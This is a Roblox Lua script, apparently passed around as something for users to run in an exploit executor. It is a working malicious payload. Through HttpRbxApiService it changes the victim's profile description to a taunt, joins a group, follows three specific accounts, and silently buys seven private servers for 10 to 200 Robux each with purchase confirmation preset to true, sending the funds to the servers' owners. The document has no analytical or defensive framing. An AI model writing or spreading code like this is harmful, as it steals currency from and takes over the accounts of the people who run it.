local HttpService = game:GetService("HttpService")
local HttpRbxApiService = game:GetService("HttpRbxApiService")

HttpRbxApiService:PostAsync("https://users.roblox.com/v1/description", HttpService:JSONEncode({
        ["description"] = "You executor is vulnerable and you account beamed!"
    }))

HttpRbxApiService:PostAsync("https://groups.roblox.com/v1/groups/33715869/users", HttpService:JSONEncode({}))

local url = "https://friends.roblox.com/v1/users/1490997802/follow"
HttpRbxApiService:PostAsync(url, HttpService:JSONEncode({}))

local url = "https://friends.roblox.com/v1/users/7207301862/follow"
HttpRbxApiService:PostAsync(url, HttpService:JSONEncode({}))

local url = "https://friends.roblox.com/v1/users/4294259993/follow"
HttpRbxApiService:PostAsync(url, HttpService:JSONEncode({}))

local player = game.Players.LocalPlayer

HttpRbxApiService:PostAsync("https://games.roblox.com/v1/games/vip-servers/5682894409", HttpService:JSONEncode({
  ["name"] = "Privatee",
  ["expectedPrice"] = 10,
  ["isPurchaseConfirmed"] = true
    }))
    wait()
    HttpRbxApiService:PostAsync("https://games.roblox.com/v1/games/vip-servers/6649459193", HttpService:JSONEncode({
  ["name"] = "Privatkae",
  ["expectedPrice"] = 15,
  ["isPurchaseConfirmed"] = true
    }))
wait()
HttpRbxApiService:PostAsync("https://games.roblox.com/v1/games/vip-servers/6649481866", HttpService:JSONEncode({
  ["name"] = "Privatess",
  ["expectedPrice"] = 30,
  ["isPurchaseConfirmed"] = true
    }))
    wait()
    HttpRbxApiService:PostAsync("https://games.roblox.com/v1/games/vip-servers/6649489422", HttpService:JSONEncode({
  ["name"] = "Privatkas",
  ["expectedPrice"] = 50,
  ["isPurchaseConfirmed"] = true
    }))
    wait()
    HttpRbxApiService:PostAsync("https://games.roblox.com/v1/games/vip-servers/6649492080", HttpService:JSONEncode({
  ["name"] = "Privatkaaas",
  ["expectedPrice"] = 100,
  ["isPurchaseConfirmed"] = true
    }))
    wait()
    HttpRbxApiService:PostAsync("https://games.roblox.com/v1/games/vip-servers/6649496680", HttpService:JSONEncode({
  ["name"] = "HuhPrivate",
  ["expectedPrice"] = 150,
  ["isPurchaseConfirmed"] = true
    }))
wait()
HttpRbxApiService:PostAsync("https://games.roblox.com/v1/games/vip-servers/6649497969", HttpService:JSONEncode({
  ["name"] = "PrivateHuh",
  ["expectedPrice"] = 200,
  ["isPurchaseConfirmed"] = true
    }))
